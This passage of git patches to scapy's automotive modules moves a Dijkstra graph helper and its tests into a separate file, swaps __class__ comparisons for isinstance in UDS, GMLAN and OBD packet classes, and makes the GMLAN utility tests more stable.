List[EcuState] + """ + Compute shortest paths from initial to end in graph + Partly from https://benalexkeen.com/implementing-djikstras-shortest-path-algorithm-with-python/ # noqa: E501 + :param graph: Graph where path is computed + :param initial: Start node + :param end: End node + :return: A path as list of nodes + """ + shortest_paths = {initial: (None, 0)} # type: Dict[EcuState, Tuple[Optional[EcuState], int]] # noqa: E501 + current_node = initial + visited = set() + + while current_node != end: + visited.add(current_node) + destinations = graph.edges[current_node] + weight_to_current_node = shortest_paths[current_node][1] + + for next_node in destinations: + weight = graph.weights[(current_node, next_node)] + \ + weight_to_current_node + if next_node not in shortest_paths: + shortest_paths[next_node] = (current_node, weight) + else: + current_shortest_weight = shortest_paths[next_node][1] + if current_shortest_weight > weight: + shortest_paths[next_node] = (current_node, weight) + + next_destinations = {node: shortest_paths[node] for node in + shortest_paths if node not in visited} + if not next_destinations: + return [] + # next node is the destination with the lowest weight + current_node = min(next_destinations, + key=lambda k: next_destinations[k][1]) + + # Work back through destinations in shortest path + last_node = shortest_paths[current_node][0] + path = [current_node] + while last_node is not None: + path.append(last_node) + last_node = shortest_paths[last_node][0] + # Reverse path + path.reverse() + return path diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 7f04a3fdfdf..240995d703c 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -13,6 +13,7 @@ import sys import signal import re +import traceback from ast import literal_eval @@ -198,6 +199,8 @@ def main(): print("\nSocket couldn't be created. Check your arguments.\n", file=sys.stderr) print(e, file=sys.stderr) + if verbose: + traceback.print_exc(file=sys.stderr) sys.exit(1) finally: diff --git a/test/contrib/automotive/enumerator.uts b/test/contrib/automotive/enumerator.uts index ca45af1d2a0..39df77a1541 100644 --- a/test/contrib/automotive/enumerator.uts +++ b/test/contrib/automotive/enumerator.uts @@ -101,53 +101,3 @@ e.state_completed["s1"] = True e.state_completed["s2"] = True assert e.completed - -+ Graph tests - -= Basic test - -g = Graph() -g.add_edge("1", "1") -g.add_edge("1", "2") -g.add_edge("2", "3") -g.add_edge("3", "4") -g.add_edge("4", "4") - -assert "1" in g.nodes -assert "2" in g.nodes -assert "3" in g.nodes -assert "4" in g.nodes -assert len(g.nodes) == 4 -assert g.dijsktra(g, "1", "4") == ["1", "2", "3", "4"] - -= Shortest path test - -g = Graph() -g.add_edge("1", "1") -g.add_edge("1", "2") -g.add_edge("2", "3") -g.add_edge("3", "4") -g.add_edge("4", "4") - -assert g.dijsktra(g, "1", "4") == ["1", "2", "3", "4"] - -g.add_edge("1", "4") - -assert g.dijsktra(g, "1", "4") == ["1", "4"] - -g.add_edge("3", "5") -g.add_edge("5", "6") - -print(g.dijsktra(g, "1", "6")) - -assert g.dijsktra(g, "1", "6") == ["1", "2", "3", "5", "6"] or g.dijsktra(g, "1", "6") == ['1', '4', '3', '5', '6'] - -g.add_edge("2", "5") - -print(g.dijsktra(g, "1", "6")) - -assert g.dijsktra(g, "1", "6") == ["1", "2", "5", "6"] - -g.add_edge("4", "6") - -assert g.dijsktra(g, "1", "6") == ["1", "4", "6"] diff --git a/test/contrib/automotive/graph.uts b/test/contrib/automotive/graph.uts new file mode 100644 index 00000000000..5cdd8abcd03 --- /dev/null +++ b/test/contrib/automotive/graph.uts @@ -0,0 +1,75 @@ +% Regression tests for graph + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.graph import * +import pickle +import io + ++ Graph tests + += Basic test + +g = Graph() +g.add_edge(("1", "1")) +g.add_edge(("1", "2")) +g.add_edge(("2", "3")) +g.add_edge(("3", "4")) +g.add_edge(("4", "4")) + +assert "1" in g.nodes +assert "2" in g.nodes +assert "3" in g.nodes +assert "4" in g.nodes +assert len(g.nodes) == 4 +assert g.dijkstra(g, "1", "4") == ["1", "2", "3", "4"] + += Shortest path test + +g = Graph() +g.add_edge(("1", "1")) +g.add_edge(("1", "2")) +g.add_edge(("2", "3")) +g.add_edge(("3", "4")) +g.add_edge(("4", "4")) + +assert g.dijkstra(g, "1", "4") == ["1", "2", "3", "4"] + +g.add_edge(("1", "4")) + +assert g.dijkstra(g, "1", "4") == ["1", "4"] + +g.add_edge(("3", "5")) +g.add_edge(("5", "6")) + +print(g.dijkstra(g, "1", "6")) + +assert g.dijkstra(g, "1", "6") == ["1", "2", "3", "5", "6"] or \ + g.dijkstra(g, "1", "6") == ['1', '4', '3', '5', '6'] + +g.add_edge(("2", "5")) + +print(g.dijkstra(g, "1", "6")) + +assert g.dijkstra(g, "1", "6") == ["1", "2", "5", "6"] + += graph add transition function + +g.add_edge(("4", "6"), transition_function=(str, str)) + +assert g.dijkstra(g, "1", "6") == ["1", "4", "6"] + += graph pickle + +f = io.BytesIO() + +pickle.dump(g, f) +unp = pickle.loads(f.getvalue()) + +assert unp.dijkstra(g, "1", "6") == ["1", "4", "6"] + +f1, f2 = unp.get_transition_tuple_for_edge(("4", "6")) +assert f1==f2 +assert "1" == f1(1) From 3308fd84bbca441e90a4bec27010a728e00036bf Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 9 Mar 2021 23:44:31 +0100 Subject: [PATCH 0525/1632] Cleanup __class__ comparisons (#3127) --- scapy/contrib/automotive/bmw/definitions.py | 4 +- scapy/contrib/automotive/bmw/hsfz.py | 6 --- scapy/contrib/automotive/doip.py | 2 +- scapy/contrib/automotive/gm/gmlan.py | 20 ++++---- scapy/contrib/automotive/obd/iid/iids.py | 2 +- scapy/contrib/automotive/obd/mid/mids.py | 2 +- scapy/contrib/automotive/obd/pid/pids.py | 4 +- scapy/contrib/automotive/obd/services.py | 8 ++-- scapy/contrib/automotive/obd/tid/tids.py | 2 +- scapy/contrib/automotive/someip.py | 2 +- scapy/contrib/automotive/uds.py | 52 ++++++++++----------- scapy/contrib/isotp.py | 5 -- 12 files changed, 49 insertions(+), 60 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 50f1dad967b..a2c90e7eedc 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -336,8 +336,8 @@ class DEV_JOB_PR(Packet): ] def answers(self, other): - return other.__class__ == DEV_JOB \ - and self.identifier == other.identifier + return isinstance(other, DEV_JOB) and \ + self.identifier == other.identifier UDS.services[0xBF] = "DevelopmentJob" diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 6d9acf1fdf2..e5d398864f6 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -48,12 +48,6 @@ def hashret(self): pay_hash = self.payload.hashret() return hdr_hash + pay_hash - def answers(self, other): - # type: (Packet) -> int - if other.__class__ == self.__class__: - return self.payload.answers(other.payload) - return 0 - def extract_padding(self, s): # type: (bytes) -> Tuple[bytes, bytes] return s[:self.length - 2], s[self.length - 2:] diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 418d558aabd..89c477adef2 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -141,7 +141,7 @@ class DoIP(Packet): def answers(self, other): # type: (Packet) -> int """DEV: true if self is an answer from other""" - if other.__class__ == self.__class__: + if isinstance(other, type(self)): if self.payload_type == 0: return 1 diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index ddd78a59151..54e20fdc226 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -96,7 +96,7 @@ def determine_len(x): ] def answers(self, other): - if other.__class__ != self.__class__: + if not isinstance(other, type(self)): return False if self.service == 0x7f: return self.payload.answers(other) @@ -165,7 +165,7 @@ class GMLAN_RFRDPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_RFRD and \ + return isinstance(other, GMLAN_RFRD) and \ other.subfunction == self.subfunction @@ -301,7 +301,7 @@ class GMLAN_RDBIPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_RDBI and \ + return isinstance(other, GMLAN_RDBI) and \ other.dataIdentifier == self.dataIdentifier @@ -333,7 +333,7 @@ class GMLAN_RDBPIPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_RDBPI and \ + return isinstance(other, GMLAN_RDBPI) and \ self.parameterIdentifier in other.identifiers @@ -400,7 +400,7 @@ class GMLAN_RMBAPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_RMBA and \ + return isinstance(other, GMLAN_RMBA) and \ other.memoryAddress == self.memoryAddress @@ -444,7 +444,7 @@ class GMLAN_SAPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_SA \ + return isinstance(other, GMLAN_SA) \ and other.subfunction == self.subfunction @@ -470,7 +470,7 @@ class GMLAN_DDMPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_DDM \ + return isinstance(other, GMLAN_DDM) \ and other.DPIDIdentifier == self.DPIDIdentifier @@ -506,7 +506,7 @@ class GMLAN_DPBAPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_DPBA \ + return isinstance(other, GMLAN_DPBA) \ and other.parameterIdentifier == self.parameterIdentifier @@ -579,7 +579,7 @@ class GMLAN_WDBIPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_WDBI \ + return isinstance(other, GMLAN_WDBI) \ and other.dataIdentifier == self.dataIdentifier @@ -693,7 +693,7 @@ class GMLAN_DCPR(Packet): ] def answers(self, other): - return other.__class__ == GMLAN_DC \ + return isinstance(other, GMLAN_DC) \ and other.CPIDNumber == self.CPIDNumber diff --git a/scapy/contrib/automotive/obd/iid/iids.py b/scapy/contrib/automotive/obd/iid/iids.py index 0e820f81554..c0d8c2b0854 100644 --- a/scapy/contrib/automotive/obd/iid/iids.py +++ b/scapy/contrib/automotive/obd/iid/iids.py @@ -30,7 +30,7 @@ class OBD_S09_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S09 \ + return isinstance(other, OBD_S09) \ and all(r.iid in other.iid for r in self.data_records) diff --git a/scapy/contrib/automotive/obd/mid/mids.py b/scapy/contrib/automotive/obd/mid/mids.py index 634805abf23..2bbd2431d12 100644 --- a/scapy/contrib/automotive/obd/mid/mids.py +++ b/scapy/contrib/automotive/obd/mid/mids.py @@ -461,7 +461,7 @@ class OBD_S06_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S06 \ + return isinstance(other, OBD_S06) \ and all(r.mid in other.mid for r in self.data_records) diff --git a/scapy/contrib/automotive/obd/pid/pids.py b/scapy/contrib/automotive/obd/pid/pids.py index cfdebf31c8c..d3bd84215a1 100644 --- a/scapy/contrib/automotive/obd/pid/pids.py +++ b/scapy/contrib/automotive/obd/pid/pids.py @@ -31,7 +31,7 @@ class OBD_S01_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S01 \ + return isinstance(other, OBD_S01) \ and all(r.pid in other.pid for r in self.data_records) @@ -49,7 +49,7 @@ class OBD_S02_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S02 \ + return isinstance(other, OBD_S02) \ and all(r.pid in [o.pid for o in other.requests] for r in self.data_records) diff --git a/scapy/contrib/automotive/obd/services.py b/scapy/contrib/automotive/obd/services.py index df166f6421d..296a704a242 100644 --- a/scapy/contrib/automotive/obd/services.py +++ b/scapy/contrib/automotive/obd/services.py @@ -88,7 +88,7 @@ class OBD_S03_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S03 + return isinstance(other, OBD_S03) class OBD_S04(Packet): @@ -99,7 +99,7 @@ class OBD_S04_PR(Packet): name = "S4_ClearDTCsPositiveResponse" def answers(self, other): - return other.__class__ == OBD_S04 + return isinstance(other, OBD_S04) class OBD_S06(Packet): @@ -121,7 +121,7 @@ class OBD_S07_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S07 + return isinstance(other, OBD_S07) class OBD_S08(Packet): @@ -150,4 +150,4 @@ class OBD_S0A_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S0A + return isinstance(other, OBD_S0A) diff --git a/scapy/contrib/automotive/obd/tid/tids.py b/scapy/contrib/automotive/obd/tid/tids.py index fd3a24dbcde..b9e4c371a18 100644 --- a/scapy/contrib/automotive/obd/tid/tids.py +++ b/scapy/contrib/automotive/obd/tid/tids.py @@ -136,7 +136,7 @@ class OBD_S08_PR(Packet): ] def answers(self, other): - return other.__class__ == OBD_S08 \ + return isinstance(other, OBD_S08) \ and all(r.tid in other.tid for r in self.data_records) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index d0b0b5fbe08..a19e008d5d9 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -144,7 +144,7 @@ def post_build(self, pkt, pay): return pkt + pay def answers(self, other): - if other.__class__ == self.__class__: + if isinstance(other, type(self)): if self.msg_type in [SOMEIP.TYPE_REQUEST_NO_RET, SOMEIP.TYPE_REQUEST_NORET_ACK, SOMEIP.TYPE_NOTIFICATION, diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index f6437404f9e..d206f448f52 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -146,7 +146,7 @@ class UDS_DSCPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_DSC and \ + return isinstance(other, UDS_DSC) and \ other.diagnosticSessionType == self.diagnosticSessionType @@ -182,7 +182,7 @@ class UDS_ERPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_ER + return isinstance(other, UDS_ER) bind_layers(UDS, UDS_ERPR, service=0x51) @@ -212,7 +212,7 @@ class UDS_SAPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_SA \ + return isinstance(other, UDS_SA) \ and other.securityAccessType == self.securityAccessType @@ -267,7 +267,7 @@ class UDS_CCPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_CC \ + return isinstance(other, UDS_CC) \ and other.controlType == self.controlType @@ -292,7 +292,7 @@ class UDS_TPPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_TP + return isinstance(other, UDS_TP) bind_layers(UDS, UDS_TPPR, service=0x7E) @@ -329,7 +329,7 @@ class UDS_ATPPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_ATP \ + return isinstance(other, UDS_ATP) \ and other.timingParameterAccessType == \ self.timingParameterAccessType @@ -355,7 +355,7 @@ class UDS_SDTPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_SDT + return isinstance(other, UDS_SDT) bind_layers(UDS, UDS_SDTPR, service=0xC4) @@ -385,7 +385,7 @@ class UDS_CDTCSPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_CDTCS + return isinstance(other, UDS_CDTCS) bind_layers(UDS, UDS_CDTCSPR, service=0xC5) @@ -419,7 +419,7 @@ class UDS_ROEPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_ROE \ + return isinstance(other, UDS_ROE) \ and other.eventType == self.eventType @@ -458,7 +458,7 @@ class UDS_LCPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_LC \ + return isinstance(other, UDS_LC) \ and other.linkControlType == self.linkControlType @@ -487,7 +487,7 @@ class UDS_RDBIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RDBI \ + return isinstance(other, UDS_RDBI) \ and self.dataIdentifier in other.identifiers @@ -529,7 +529,7 @@ class UDS_RMBAPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RMBA + return isinstance(other, UDS_RMBA) bind_layers(UDS, UDS_RMBAPR, service=0x63) @@ -557,7 +557,7 @@ class UDS_RSDBIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RSDBI \ + return isinstance(other, UDS_RSDBI) \ and other.dataIdentifier == self.dataIdentifier @@ -593,7 +593,7 @@ class UDS_RDBPIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RDBPI \ + return isinstance(other, UDS_RDBPI) \ and other.periodicDataIdentifier == self.periodicDataIdentifier @@ -625,7 +625,7 @@ class UDS_DDDIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_DDDI \ + return isinstance(other, UDS_DDDI) \ and other.subFunction == self.subFunction @@ -652,7 +652,7 @@ class UDS_WDBIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_WDBI \ + return isinstance(other, UDS_WDBI) \ and other.dataIdentifier == self.dataIdentifier @@ -713,7 +713,7 @@ class UDS_WMBAPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_WMBA \ + return isinstance(other, UDS_WMBA) \ and other.memorySizeLen == self.memorySizeLen \ and other.memoryAddressLen == self.memoryAddressLen @@ -738,7 +738,7 @@ class UDS_CDTCIPR(Packet): name = 'ClearDiagnosticInformationPositiveResponse' def answers(self, other): - return other.__class__ == UDS_CDTCI + return isinstance(other, UDS_CDTCI) bind_layers(UDS, UDS_CDTCIPR, service=0x54) @@ -828,7 +828,7 @@ class UDS_RDTCIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RDTCI \ + return isinstance(other, UDS_RDTCI) \ and other.reportType == self.reportType @@ -863,7 +863,7 @@ class UDS_RCPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RC \ + return isinstance(other, UDS_RC) \ and other.routineControlType == self.routineControlType \ and other.routineIdentifier == self.routineIdentifier @@ -912,7 +912,7 @@ class UDS_RDPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RD + return isinstance(other, UDS_RD) bind_layers(UDS, UDS_RDPR, service=0x74) @@ -957,7 +957,7 @@ class UDS_RUPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RU + return isinstance(other, UDS_RU) bind_layers(UDS, UDS_RUPR, service=0x75) @@ -983,7 +983,7 @@ class UDS_TDPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_TD \ + return isinstance(other, UDS_TD) \ and other.blockSequenceCounter == self.blockSequenceCounter @@ -1008,7 +1008,7 @@ class UDS_RTEPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_RTE + return isinstance(other, UDS_RTE) bind_layers(UDS, UDS_RTEPR, service=0x77) @@ -1093,7 +1093,7 @@ def _contains_data_format_identifier(packet): ] def answers(self, other): - return other.__class__ == UDS_RFT + return isinstance(other, UDS_RFT) bind_layers(UDS, UDS_RFTPR, service=0x78) @@ -1121,7 +1121,7 @@ class UDS_IOCBIPR(Packet): ] def answers(self, other): - return other.__class__ == UDS_IOCBI \ + return isinstance(other, UDS_IOCBI) \ and other.dataIdentifier == self.dataIdentifier diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index a90f0e763d7..f81e002d9d6 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -72,11 +72,6 @@ class ISOTP(Packet): ] __slots__ = Packet.__slots__ + ["src", "dst", "exsrc", "exdst"] - def answers(self, other): - if other.__class__ == self.__class__: - return self.payload.answers(other.payload) - return 0 - def __init__(self, *args, **kwargs): self.src = None self.dst = None From 4f3fa3be921e24f6da49a80fd3ec6fa174aae185 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 11 Mar 2021 10:36:24 +0100 Subject: [PATCH 0526/1632] Improve stability of gmlan utils tests (#3112) --- test/contrib/automotive/gm/gmlanutils.uts | 157 +++++++++++++++++++--- 1 file changed, 135 insertions(+), 22 deletions(-) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 7a9ff4746bd..8ee65090aa8 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -25,8 +25,10 @@ load_contrib("automotive.gm.gmlanutils", globals_dict=globals()) + GMLAN_RequestDownload Tests ############################################################################## = Positive, immediate positive response -ecusimSuccessfullyExecuted = True +drain_bus(iface0) +ecusimSuccessfullyExecuted = False started = threading.Event() + def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True @@ -35,6 +37,8 @@ def ecusim(): pkt = GMLAN()/GMLAN_RD(memorySize=4) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False + else: + ecusimSuccessfullyExecuted = True ack = b"\x74" isotpsock2.send(ack) @@ -44,11 +48,13 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base started.wait(timeout=5) res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True thread.join(timeout=5) - assert res +assert res assert ecusimSuccessfullyExecuted == True = Negative, immediate negative response + +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -65,11 +71,14 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Negative, timeout + +drain_bus(iface0) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False ############################ Response pending = Positive, after response pending +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -84,13 +93,12 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base thread.start() started.wait(timeout=5) res = GMLAN_RequestDownload(isotpsock, 4, timeout=2) == True - join = thread.join(timeout=5) - print("JOIN", join) - print("Result", repr(res)) + thread.join(timeout=5) assert res = Positive, hold response pending for several messages -tout = 0.8 +drain_bus(iface0) +tout = 1 repeats = 4 started = threading.Event() def ecusim(): @@ -109,10 +117,8 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base started.wait(timeout=5) starttime = time.time() # may be inaccurate -> on some systems only seconds precision result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) - endtime = time.time() - join = thread.join(timeout=5) - print("Result", repr(result)) - print("Join", join) + endtime = time.time() + 1 + thread.join(timeout=5) assert result print(endtime - starttime) print(tout * (repeats - 1)) @@ -120,6 +126,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = Negative, negative response after response pending +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -138,8 +145,8 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res - = Negative, timeout after response pending +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -158,6 +165,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = Positive, pending message from different service interferes while pending +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -165,8 +173,11 @@ def ecusim(): pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) isotpsock2.send(pending) wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x78) + time.sleep(0.1) isotpsock2.send(wrongservice) + time.sleep(0.1) isotpsock2.send(pending) + time.sleep(0.1) ack = b"\x74" isotpsock2.send(ack) @@ -179,15 +190,19 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Positive, negative response from different service interferes while pending +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) isotpsock2.send(pending) + time.sleep(0.1) wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x22) isotpsock2.send(wrongservice) + time.sleep(0.1) isotpsock2.send(pending) + time.sleep(0.1) ack = b"\x74" isotpsock2.send(ack) @@ -201,6 +216,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base ################### RETRY = Positive, first: immediate negative response, retry: Positive +drain_bus(iface0) started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted @@ -237,6 +253,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + GMLAN_TransferData Tests ############################################################################## = Positive, short payload, scheme = 4 +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -263,6 +280,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme = 3 +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 3 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -289,6 +307,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme = 2 +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -315,6 +334,7 @@ with new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x242, did=0x642, ba assert ecusimSuccessfullyExecuted == True = Negative, short payload +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -323,7 +343,7 @@ def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) isotpsock2.send(nr) @@ -335,11 +355,14 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base thread.join(timeout=5) assert res +drain_bus(iface0) = Negative, timeout with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=1) == False +drain_bus(iface0) + = Positive, long payload conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" @@ -375,21 +398,22 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base # +drain_bus(iface0) = Positive, first part of payload succeeds, second pending, then fails, retry succeeds conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x76" # second package with inscreased address - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pending = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x78) isotpsock2.send(pending) time.sleep(0.1) nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) + isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) ack = b"\x76" isotpsock2.send(ack) @@ -402,19 +426,24 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res ############ +drain_bus(iface0) = Positive, maxmsglen length check -> message is split automatically * TODO: This test causes an error in ISOTPSoftSockets exit_if_no_isotp_module() + conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True sim_started = threading.Event() -started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: + if ISOTP_KERNEL_MODULE_AVAILABLE: + isosock = lambda sock: ISOTPSocket(sock, sid=0x642, did=0x242, basecls=GMLAN) + else: + isosock = lambda sock: ISOTPSocket(sock, sid=0x642, did=0x242, basecls=GMLAN, rx_separation_time_min=2) + with new_can_socket0() as isocan, isosock(isocan) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=3, started_callback=sim_started.set) pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, dataRecord=payload*511+payload[:1]) @@ -423,6 +452,7 @@ def ecusim(): return ack = b"\x76" # second package with inscreased address + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000FF9, dataRecord=payload[1:]) @@ -430,6 +460,7 @@ def ecusim(): ecusimSuccessfullyExecuted = False return ack = b"\x76" + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -444,13 +475,14 @@ with new_can_socket0() 